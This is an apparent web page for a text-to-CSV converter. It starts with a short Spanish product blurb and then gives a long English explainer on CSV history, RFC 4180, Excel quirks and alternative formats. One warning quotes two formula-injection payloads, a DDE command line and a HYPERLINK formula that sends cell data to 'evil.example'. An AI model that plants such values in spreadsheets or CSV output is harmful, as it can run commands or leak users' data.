Conversor gratuito de texto a CSV
Convierte datos textuales tabulares al formato CSV. Detección automática de separadores, gestión de comillas y vista previa antes de descargar.
Acerca del formato CSV
CSV (Comma-Separated Values, valores separados por comas) es un formato de texto simple para almacenar datos tabulares. Cada fila representa un registro y los valores están separados por comas. CSV está ampliamente admitido por hojas de cálculo, bases de datos y herramientas de análisis.
¿Por qué convertir a CSV?
- Portabilidad de los datos · convierte desde cualquier formato de texto a CSV, fácil de importar en una hoja de cálculo.
- Formato universal · CSV está admitido por Excel, Google Sheets, bases de datos y herramientas de programación.
- Limpieza de datos · estandariza separadores y formato incoherentes.
- API y automatización · CSV es ideal para operaciones masivas e integraciones.
- Formato de archivo · conserva datos tabulares en un formato legible e independiente de la plataforma.
Preguntas frecuentes
¿Qué separadores admite la herramienta?
Detecta automáticamente tabulación, espacio, coma, punto y coma y barra vertical. También puedes definir un separador personalizado de un solo carácter.
¿Cómo gestionar los campos que contienen una coma?
Activa la opción «Entrecomillar los campos que contienen una coma» para rodearlos de comillas, lo que los hace conformes con CSV.
¿Puedo incluir un encabezado?
Sí, activa la opción «Incluir una fila de encabezado» si tu primera fila contiene los nombres de las columnas.
A short history of CSV, older than the spec that defines it
CSV is the format everyone uses and nobody owns. Its lineage is informal. The earliest documented usage of the comma-separated convention dates to 1972, when IBM Fortran (level H extended) supported list-directed input/output where commas served as separators between values on a line. Through the 1970s and 1980s, every database, spreadsheet, statistics package and accounting application that needed to swap data with another tool independently invented some variant of "values separated by some character on lines separated by some other character." There was no spec. There was no governing body. There was no canonical implementation. There was just consensus, in the loosest possible sense.
By the early 2000s, the cost of the chaos became impossible to ignore. The IETF eventually accepted a specification, RFC 4180, "Common Format and MIME Type for Comma-Separated Values (CSV) Files," published in October 2005 by Yakov Shafranovich. RFC 4180 is short, just a handful of pages, and it codified what most people had already converged on: a comma as field separator, double quote as the optional enclosure character for fields that contain commas or quotes or newlines, doubled double-quotes ("") as the way to escape a literal quote inside a quoted field, CRLF as the line terminator, and text/csv as the MIME type registered with IANA. The spec also defined an optional header parameter for the MIME type so a sender could tell a receiver whether the first line is a header row.
RFC 4180 is informational, not a strict standard. Compliance with it is voluntary. But it gives us a target, the closest thing CSV has to a definition of "correct." A later document, the W3C "Model for Tabular Data and Metadata on the Web" (CSVW, 2015), tried to extend the metadata story for CSV by attaching a JSON sidecar that says what each column is and how to interpret it. CSVW is widely cited and rarely deployed.
"CSV" in the wild doesn't mean what RFC 4180 says it means
Anyone who has had to receive a CSV from a stranger knows the shape of the problem. The disagreements break down along several axes:
- The separator character. RFC 4180 says comma. European Excel installations in countries where the comma is the decimal separator (most of continental Europe, France, Germany, Italy, Spain, the Netherlands, Brazil) default to writing CSV with a semicolon as the separator, because using a comma would collide with numeric values like
3,14for π. The file extension is still.csv; the MIME type is stilltext/csv; the content is not what an American or British recipient expects. - Quoting. RFC 4180 says wrap in double quotes when a field contains the separator, a quote, or a newline; double the embedded quotes (so
He said "hi"becomes"He said ""hi"""). In practice, many writers quote everything (paranoid), some quote nothing (and break the moment a comma appears), and a few escape with backslash (\"), a C convention that breaks RFC-compliant parsers. - Line endings. RFC 4180 mandates CRLF (
\r\n). Excel on Windows produces CRLF. Excel on classic Mac produced CR (\r) only. Most Unix and Linux tools produce LF (\n). All three appear in files labelled.csvand the variation breaks parsers that hard-code one expectation. - Trailing newlines. Some writers terminate the last record with a line break; others don't. Parsers that count records by counting line breaks report off-by-one errors depending on the input.
- Headers. Files in the wild are split roughly half and half. The MIME type allows a
header=presentparameter, but nobody sends MIME headers when they email you a CSV, so you have to guess.
The BOM trap
This deserves its own section because it's the single most common source of cross-platform CSV pain. Microsoft Excel will not auto-detect a UTF-8 encoded CSV unless the file begins with a UTF-8 byte order mark: the three bytes EF BB BF, which encode Unicode character U+FEFF. Without the BOM, Excel opens the file in the legacy code page of the user's Windows locale (Windows-1252 in the West, Shift_JIS in Japan, GBK in mainland China). Any non-ASCII character (accented letters, currency symbols, emoji, CJK characters) is mangled.
The fix is to prepend the BOM. The cost is that everything else chokes on it. Apple Numbers (until recent versions) shows the BOM as a literal character in the first cell. Many command-line tools (awk, cut, older sed) treat the BOM as part of the first field, so a header that should read name reads name. Most JavaScript CSV parsers strip it; many older Python csv-module workflows don't (you have to open the file with the utf-8-sig codec). Since a free online tool can't know where the user will open the file, omitting the BOM and documenting that Excel users should use Data → From Text/CSV (which always lets the user pick UTF-8 explicitly) is a reasonable default.
Excel ships at least four "CSV" formats
Excel's "Save As" dialog offers more than one CSV variant, and the differences matter:
- CSV (Comma delimited) (*.csv): uses the user's locale list separator (comma in en-US/en-GB, semicolon in fr-FR/de-DE/es-ES/it-IT/pt-BR). Encoding is the legacy ANSI code page. No BOM. Line endings CRLF.
- CSV UTF-8 (Comma delimited) (*.csv): same separator behaviour as above (still locale-driven, despite the name) but encoded in UTF-8 with a BOM. Introduced in Excel 2016.
- CSV (Macintosh) (*.csv): comma-separated, MacRoman encoding, classic Mac line endings (CR only). Largely obsolete but still appears.
- CSV (MS-DOS) (*.csv): comma-separated, OEM code page (CP437 in en-US, CP850 in Western Europe), CRLF.
The user-facing label says "CSV" four different ways. The actual file content is materially different. This is the practical reality the converter operates inside.
Why convert text → CSV, specifically
Most online "CSV tools" run the inverse direction: take a CSV, emit something else (JSON, an HTML table, a SQL INSERT, a printable PDF). This one runs the opposite: take messy text, produce clean CSV. That's the use case for:
- Cleaning a list of emails into spreadsheet rows. A CRM operator copies 800 emails out of a BCC field into a notepad. Each email needs to be on its own row in a spreadsheet for upload to a mail-merge tool. Paste, add header, download.
- Converting a copied table from a PDF. PDF tables, when copied, often arrive as text where columns are separated by runs of spaces (or tabs, depending on the PDF generator). A flexible delimiter (including "consecutive whitespace") turns this into a clean grid.
- Restructuring AI-generated outputs. Large language models love to emit Markdown tables. A user can paste a Markdown table; the converter detects the pipe delimiters and the dash separator row; the output is a real CSV.
- Importing logs into Excel or Google Sheets. Apache combined log format, syslog records, and many application logs are line-oriented but not natively spreadsheet-friendly. Convert to CSV, open in a spreadsheet, sort, filter, pivot.
- Preparing data for database
COPYstatements. PostgreSQL'sCOPY ... FROM STDIN WITH (FORMAT csv)reads CSV directly. A user with a list in a text file can paste, convert and\copyinto a table without writing a loader script. - Building CSV by hand for batch operations. Stripe, Mailchimp, Shopify and most SaaS platforms expose CSV import for bulk operations. A user who needs to update 30 product prices manually constructs the rows; the tool turns their typed list into the exact CSV the platform expects.
Excel will rewrite your data, sometimes silently
A handful of CSV foot-guns bite even careful users:
- Leading zeros disappear. A US ZIP code of
01234opens as1234. A phone extension of0049opens as49. A product code of00ABCopens asABCif Excel decides the column is text mid-stream. The only reliable defence is to either prepend an apostrophe (display hack), pre-format the column as text, or use Excel's Data → From Text/CSV import path which lets you lock column types. - Scientific notation auto-conversion. A long numeric string like
0123456789012becomes1.23457E+11when Excel decides it's a number. The original characters are gone. This famously corrupted gene-name datasets so badly that the HUGO Gene Nomenclature Committee renamed several genes in 2020 specifically to escape Excel's coercion, gene symbols like MARCH1, SEPT2 and OCT4 had been turning into dates. - Date auto-detection. A column containing musical key signatures
3/4,4/4,6/8,7/8becomes dates: 3 April, 4 April, 6 August, 7 August. Same for serial numbers like1-1and times like1:30. - Hexadecimal interpretation.
0x1Aand0E5are both valid Excel-recognised number representations. A column of register addresses or chemistry compound codes can silently mutate. - The CSV injection attack. A field starting with
=,+,-,@, or a tab/CR is interpreted by Excel and Google Sheets as a formula. A malicious value like=cmd|'/c calc'!A0or=HYPERLINK("https://evil.example/?d="&A1, "Click")can exfiltrate adjacent cell contents or run shell commands depending on the spreadsheet client's settings. Any tool that emits CSV from user-submitted text should consider escaping leading formula characters. - Quoted fields containing newlines. A field like
"Hello,\nworld"with a literal newline inside the quotes is one field spanning two lines on disk. Parsers that split on newlines first and then on commas will silently corrupt the data. Correct CSV parsing is a state machine, not two passes ofString.split.
Where this tool fits among CSV's modern alternatives
CSV survives because it's text and humans can read it. For serious data interchange, several formats have eaten its lunch on specific dimensions:
- Apache Parquet. A binary columnar format. Files are typed, compressed and column-oriented (so
SELECT col1 FROM big_file.parquetreads only that column from disk). Default for analytics workloads, Snowflake, BigQuery, Databricks and Athena read it natively. Strongest contender for "what should you use instead of CSV when you control both ends." Binary, so it doesn't satisfy the "I can read this in a text editor" use case. - JSON Lines (JSONL / NDJSON). One JSON object per line. Combines the streamability of CSV with the typed, nested structure of JSON. Widely used for log ingestion, ML datasets and event streams. Trade-off: more verbose than CSV (every record repeats every key).
- Apache Arrow IPC (Feather v2). A binary in-memory and on-the-wire format for tabular data, designed for zero-copy interchange between processes and languages. Used heavily inside data-science toolchains (pandas, R's arrow package, Polars, DuckDB).
- Avro and ORC. Binary, schema-carrying formats from the Hadoop ecosystem. Less common outside data engineering.
For a free online converter aimed at developers and office workers, CSV remains the right output format because it's the lingua franca of data import everywhere. Modern alternatives exist; they have not displaced CSV in the inbox.
More questions
Should I add a UTF-8 BOM to the output?
If the file is destined for Excel double-click on Windows, yes, without the BOM, Excel opens it in the legacy code page and mangles non-ASCII text. If it's destined for anything else (Apple Numbers, command-line scripts, web upload forms), omit the BOM. The safest path is to omit the BOM and instruct Excel users to import via Data → From Text/CSV, where they can choose UTF-8 explicitly.
My CSV opens with one cell per row in Excel, what went wrong?
Almost always a separator mismatch. You're in a locale where Excel expects semicolons (most of continental Europe), but the file uses commas, or vice versa. Open with Data → From Text/CSV instead of double-clicking; that wizard lets you choose the delimiter explicitly. Or save the file from Excel's Save As menu using the variant matching your local separator.
What's the difference between TSV and CSV?
TSV uses tab characters as the separator instead of commas, with its own MIME type text/tab-separated-values and IANA registration. The advantage of TSV is that real-world data rarely contains literal tabs, so quoting is almost never needed; the disadvantage is that tabs are invisible in text editors and copy-paste behaviour varies. CSV's quoting machinery makes it safe for fields that contain the delimiter; TSV mostly avoids the problem entirely.
Is there a CSV linter I can run before sharing my file?
Yes, for command-line use, csvkit's csvclean reports rows with the wrong number of columns. Frictionless Data's frictionless CLI validates against an optional schema. For browser-based work, PapaParse reports parse errors line-by-line. Strict validation against RFC 4180 (CRLF line endings, doubled-quote escaping) is rare in practice; most parsers accept any of the common variants.